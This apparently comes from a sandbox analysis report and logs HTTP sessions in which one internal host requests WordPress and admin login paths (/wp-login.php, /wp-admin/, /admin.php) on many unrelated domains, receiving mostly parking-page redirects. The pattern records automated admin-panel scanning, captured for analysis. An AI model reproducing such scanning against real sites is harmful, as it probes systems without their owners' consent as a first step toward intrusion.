Nov 30, 2023 11:22:42.139405012 CET	520	IN	Data Raw: 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d Data Ascii: el="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjczMjVhODMtZGI5Zi00ZjQyLThjMDUtNTY2YzdkOGJlNTlhIiwicGFnZV90aW1lIjoxNzAxMzM5NzYyLCJwYWdlX3V
Nov 30, 2023 11:22:42.155291080 CET	520	IN	Data Raw: 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d Data Ascii: el="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjczMjVhODMtZGI5Zi00ZjQyLThjMDUtNTY2YzdkOGJlNTlhIiwicGFnZV90aW1lIjoxNzAxMzM5NzYyLCJwYWdlX3V

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.4	63728	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.179642916 CET	224	OUT	GET /wp-login.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.278970957 CET	883	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DH5QZKJOMqMFd+Dbw3t2nBVRH36Axktbo8vtERjy5noFY14nvucoKJWXVHuwjd/NtugCdVBWkwZfoRDtBfIILg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:43.791282892 CET	331	OUT	GET /wp-admin/ HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://6ail.com/wp-login.php
Nov 30, 2023 11:22:43.891273022 CET	880	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RH5iYS5QCyapldi89ayYJ/o5I3yFdAbYWYutZekfjcaiq4K3zydMajH0dL/uYSNNsZU6yfbt2wduip8M3dJl6w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:44.112431049 CET	880	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RH5iYS5QCyapldi89ayYJ/o5I3yFdAbYWYutZekfjcaiq4K3zydMajH0dL/uYSNNsZU6yfbt2wduip8M3dJl6w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.4	63762	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.194750071 CET	217	OUT	GET /admin.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.294117928 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XBLXb1itJWVVOT7OQecOZLhq2rdd4sYmorwj+4rE40kLQLXSr2IlxgeuRJ2/Xn+PO3eJANVOzWC4eWfGq3XDIA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:42.499861956 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XBLXb1itJWVVOT7OQecOZLhq2rdd4sYmorwj+4rE40kLQLXSr2IlxgeuRJ2/Xn+PO3eJANVOzWC4eWfGq3XDIA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.4	63764	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.194905043 CET	220	OUT	GET /admin.php HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.295452118 CET	878	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V2HKBrnNj22P3sUwPNPwPrByo8R10vxVhvF0iMUFKXG731XPObO6iDeKghHpHIkRb4ryLWiNZapovtBp7qMHZA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:42.502661943 CET	878	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V2HKBrnNj22P3sUwPNPwPrByo8R10vxVhvF0iMUFKXG731XPObO6iDeKghHpHIkRb4ryLWiNZapovtBp7qMHZA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.4	63804	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.215290070 CET	217	OUT	GET /admin.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.314937115 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XBLXb1itJWVVOT7OQecOZLhq2rdd4sYmorwj+4rE40kLQLXSr2IlxgeuRJ2/Xn+PO3eJANVOzWC4eWfGq3XDIA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.4	63919	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.229865074 CET	225	OUT	GET /wp-login.php HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.328910112 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:42 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com
Nov 30, 2023 11:22:44.592000008 CET	291	OUT	GET /wp-admin/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com
Nov 30, 2023 11:22:44.691082954 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:44 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.4	63920	3.33.224.147	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.229880095 CET	215	OUT	GET /admin HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.339438915 CET	499	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/admin X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.4	63023	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.245012045 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.423775911 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:22:44.046853065 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:22:44.225450039 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.4	62790	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.245016098 CET	219	OUT	GET /admin.php HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.459302902 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.4	63105	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.245024920 CET	224	OUT	GET /admin.php HTTP/1.1 Host: ct.ated.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.344475985 CET	1340	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 12477 Last-Modified: Mon, 13 Nov 2023 23:32:46 GMT Connection: keep-alive ETag: "6552b21e-30bd" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_dMUSC8gPvnkbyUwxe285FkNW0gm6BC0qND0b6+W+dVt3/ILy0hQ+UR2Y7Xrybd9iGR0OW3ZqE2ts0nTnsRc77A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.58;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 